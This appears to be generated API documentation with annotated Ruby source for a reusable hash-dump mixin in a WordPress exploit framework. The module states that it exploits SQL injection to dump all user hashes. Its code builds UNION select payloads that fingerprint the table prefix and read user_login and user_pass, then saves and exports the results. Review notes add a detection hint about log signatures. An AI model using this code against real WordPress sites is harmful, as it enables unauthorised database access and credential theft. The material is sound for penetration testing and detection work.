Module: Wpxf::WordPress::HashDump

Includes:
Wpxf
Defined in:
lib/wpxf/wordpress/hash_dump.rb

Overview

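Provides reusable functionality for hash dump modules. It builds the SQL select statements used to fingerprint the table prefix and to read user_login and user_pass from the users table, and it drives the dump, save and optional export steps in #run. The request hooks (#vulnerable_url, #hashdump_request_method, #hashdump_request_params, #hashdump_request_body) return placeholder defaults that an including module is presumably expected to override.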


Instance Method Details

#export_path ⇒ String

Returns the path to export the hash dump to.

Returns:

  • (String)

    the path to export the hash dump to.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 30

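# Resolves the optional 'export_path' option to an absolute file path.
#
# The option is read once, so the nil check and the expansion always work on
# the same value. File.expand_path resolves a relative path against the
# current working directory and expands a leading "~".
#
# @return [String, nil] the absolute path to export the hash dump to, or nil
#   when the option has no value.
def export_path
  configured = normalized_option_value('export_path')
  return nil if configured.nil?

  File.expand_path(configured)
end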

#hashdump_custom_union_values ⇒ Array

Returns an array of values to use in the generated union statement.

Returns:

  • (Array)

    an array of values to use in the generated union statement.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 41

# Values to use in the generated union statement.
#
# NOTE(review): how these values are consumed is not visible here; presumably
# _hashdump_union_cols reads them, and including modules override this.
#
# @return [Array] an empty array by default.
def hashdump_custom_union_values
  []
end

#hashdump_number_of_cols ⇒ Integer

Returns the number of columns in the vulnerable SQL statement.

Returns:

  • (Integer)

    the number of columns in the vulnerable SQL statement.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 73

# Number of columns in the vulnerable SQL statement.
#
# NOTE(review): presumably used to size the column list of the union select
# (see _hashdump_union_cols, not visible here) - confirm.
#
# @return [Integer] 1 by default.
def hashdump_number_of_cols
  1
end

#hashdump_prefix_fingerprint_statement ⇒ String

Returns a unique select statement that can be used to fingerprint the database prefix.

Returns:

  • (String)

    a unique select statement that can be used to fingerprint the database prefix.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 57

# Builds the select statement used to fingerprint the database table prefix.
#
# The column at hashdump_visible_field_index is replaced with a concat of the
# begin token, table_name and the end token, separated by 0x3a (the ':'
# character). Rows come from information_schema.tables, restricted to the
# current database.
#
# @return [String] the select statement, with " limit <_current_row>,1"
#   appended when reveals_one_row_per_request is true.
def hashdump_prefix_fingerprint_statement
  columns = _hashdump_union_cols
  slot = hashdump_visible_field_index
  columns[slot] = "concat(#{_bof_token},0x3a,table_name,0x3a,#{_eof_token})"

  statement = "select #{columns.join(',')} from information_schema.tables where table_schema = database()"
  if reveals_one_row_per_request
    # Only one row is shown per response, so page through with the row cursor.
    "#{statement} limit #{_current_row},1"
  else
    statement
  end
end

#hashdump_request_body ⇒ Hash, String

Returns the body to be used when requesting the hash dump.

Returns:

  • (Hash, String)

    the body to be used when requesting the hash dump.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 88

# Body to be used when requesting the hash dump.
#
# NOTE(review): presumably overridden by including modules that need to send
# a request body - confirm against the callers.
#
# @return [Hash, String, nil] nil by default, i.e. no body.
def hashdump_request_body
  nil
end

#hashdump_request_method ⇒ Symbol

Returns the HTTP method to use when requesting the hash dump.

Returns:

  • (Symbol)

    the HTTP method to use when requesting the hash dump.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 78

# HTTP method to use when requesting the hash dump.
#
# @return [Symbol] :get by default.
def hashdump_request_method
  :get
end

#hashdump_request_params ⇒ Hash

Returns the parameters to be used when requesting the hash dump.

Returns:

  • (Hash)

    the parameters to be used when requesting the hash dump.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 83

# Parameters to be used when requesting the hash dump.
#
# NOTE(review): presumably overridden by including modules to supply the
# request parameters - confirm against the callers.
#
# @return [Hash, nil] nil by default, i.e. no parameters.
def hashdump_request_params
  nil
end

#hashdump_sql_statement ⇒ String

Returns a unique SQL select statement that can be used to extract the hashes.

Returns:

  • (String)

    a unique SQL select statement that can be used to extract the hashes.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 46

# Builds the select statement that reads user logins and password hashes from
# the users table, whose name is table_prefix followed by "users".
#
# The column at hashdump_visible_field_index is replaced with a concat of the
# begin token, user_login, user_pass and the end token, separated by 0x3a
# (the ':' character).
#
# NOTE(review): for detection, this fixed shape (a concat around
# user_login/user_pass selected from a "*users" table, optionally followed by
# "limit N,1") may appear in request parameters or bodies recorded by
# web-server and WAF logs; how the statement is sent is not visible here.
#
# @return [String] the select statement, with " limit <_current_row>,1"
#   appended when reveals_one_row_per_request is true.
def hashdump_sql_statement
  columns = _hashdump_union_cols
  slot = hashdump_visible_field_index
  columns[slot] = "concat(#{_bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{_eof_token})"

  statement = "select #{columns.join(',')} from #{table_prefix}users"
  if reveals_one_row_per_request
    # Only one row is shown per response, so page through with the row cursor.
    "#{statement} limit #{_current_row},1"
  else
    statement
  end
end

#hashdump_visible_field_index ⇒ Integer

Returns the zero-based index of the column which is visible in the response output.

Returns:

  • (Integer)

    the zero-based index of the column which is visible in the response output.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 68

# Zero-based index of the column which is visible in the response output.
#
# hashdump_sql_statement and hashdump_prefix_fingerprint_statement write their
# concat expression into the column list at this index.
#
# @return [Integer] 0 by default.
def hashdump_visible_field_index
  0
end

#initialize ⇒ Object

Initialises a new instance of Wpxf::WordPress::HashDump



# File 'lib/wpxf/wordpress/hash_dump.rb', line 8

# Initialises a new instance of Wpxf::WordPress::HashDump.
#
# After calling super, it sets the module description, registers the optional
# 'export_path' string option and calls _generate_id_tokens.
# NOTE(review): _generate_id_tokens presumably creates the begin/end tokens
# read through _bof_token and _eof_token - confirm.
def initialize
  super

  # The whitespace inside the literal is part of the description and is kept as-is.
  summary = %(
      This module exploits an SQL injection vulnerability to generate
      a dump of all the user hashes in the database.
    )
  _update_info_without_validation(desc: summary)

  export_option = StringOption.new(
    name: 'export_path',
    desc: 'The file to save the hash dump to',
    required: false
  )
  register_options([export_option])

  _generate_id_tokens
end

#reveals_one_row_per_request ⇒ Boolean

Returns true if only one row of the SQL query will be displayed per request.

Returns:

  • (Boolean)

    returns true if only one row of the SQL query will be displayed per request.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 36

# Whether only one row of the SQL query will be displayed per request.
#
# When this is true, hashdump_sql_statement and
# hashdump_prefix_fingerprint_statement append " limit <_current_row>,1".
#
# @return [Boolean] false by default.
def reveals_one_row_per_request
  false
end

#run ⇒ Boolean

Run the module.

Returns:

  • (Boolean)

    true if successful.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 104

# Runs the module: determines the table prefix, then dumps the user hashes.
#
# The de-duplicated hashes are passed to _output_hashdump_table and
# _save_hashes, and to _export_hashes as well when export_path is set.
#
# @return [Boolean] false when the parent run or _determine_prefix fails,
#   true otherwise.
def run
  return false unless super

  # Reset the row cursor before each phase.
  # NOTE(review): presumably read back through _current_row - confirm.
  @_current_row = 0
  emit_info('Determining database prefix...')
  return false unless _determine_prefix

  emit_success("Found prefix: #{table_prefix}", true)

  @_current_row = 0
  emit_info('Dumping user hashes...')
  dumped = _dump_and_parse_hashes.uniq
  _output_hashdump_table(dumped)
  _save_hashes(dumped)

  if export_path
    _export_hashes(dumped)
  end
  true
end

#table_prefix ⇒ String

Returns the table prefix determined by the module.

Returns:

  • (String)

    the table prefix determined by the module.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 98

# Reader for the table prefix determined by the module.
#
# NOTE(review): @table_prefix is not assigned in the code shown here;
# presumably _determine_prefix sets it during run - confirm.
#
# @return [String, nil] the value of @table_prefix, nil until it is assigned.
def table_prefix
  @table_prefix
end

#vulnerable_url ⇒ String

Returns the URL of the vulnerable page.

Returns:

  • (String)

    the URL of the vulnerable page.



# File 'lib/wpxf/wordpress/hash_dump.rb', line 93

# URL of the vulnerable page.
#
# NOTE(review): nil is not a usable URL, so an including module presumably
# has to override this - confirm against the callers.
#
# @return [String, nil] nil by default.
def vulnerable_url
  nil
end